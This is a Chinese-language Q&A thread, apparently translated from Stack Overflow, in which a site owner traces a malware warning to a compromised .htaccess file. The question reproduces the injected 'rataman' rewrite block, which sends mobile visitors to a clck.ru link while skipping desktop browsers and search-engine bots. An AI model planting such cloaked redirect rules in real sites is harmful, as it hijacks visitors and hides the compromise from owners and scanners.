【发布时间】:2014-01-16 08:16:33
【问题描述】:
我有一个网站,根据Sucuri SiteCheck,它显然包含恶意软件。它引用了一些指向clck.ru的链接。
查看代码并没有提到clck.ru或类似的。
我已经运行了 maldetect(在操作系统 Ubuntu 上),它找到了一些我已经删除的文件。
我已更新所有应用程序并重新启动系统。
但 Sucuri SiteCheck 仍然无法验证网站是否干净。
我指的网站是 cphdans.dk。任何人都可以帮助我做更多的事情吗?
可能是某种 SQL 注入黑客,所以我应该在 MySQL 数据库中搜索一些东西(找不到 clck.ru)。
更新:
.htaccess 文件被以下代码破坏:
#########rataman##########
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,$
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu9$
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|a$
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleW$
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|ameri$
RewriteRule ^(.*)$ http://clck.ru/8sNeJ [L,R=302]
#########!rataman!#########
【问题讨论】:
-
尝试定位
eval调用,查看.htaccess文件,也可以通过那个来完成 -
也可能是您在 MySQL
database中的广告或文章的一部分@ -
也可以尝试使用Google Webmaster Tools,他们可能会为您提供更多信息。 (而且我似乎更信任谷歌,而不是那个 Sucuri 网站,但这只是我的看法)。此外,如果您想了解有关网站发生这种情况的更多信息等。您应该将您的问题发布到Information Security。
-
确实是.htaccess 被泄露了!谢谢你。我如何给你正确答案的信用?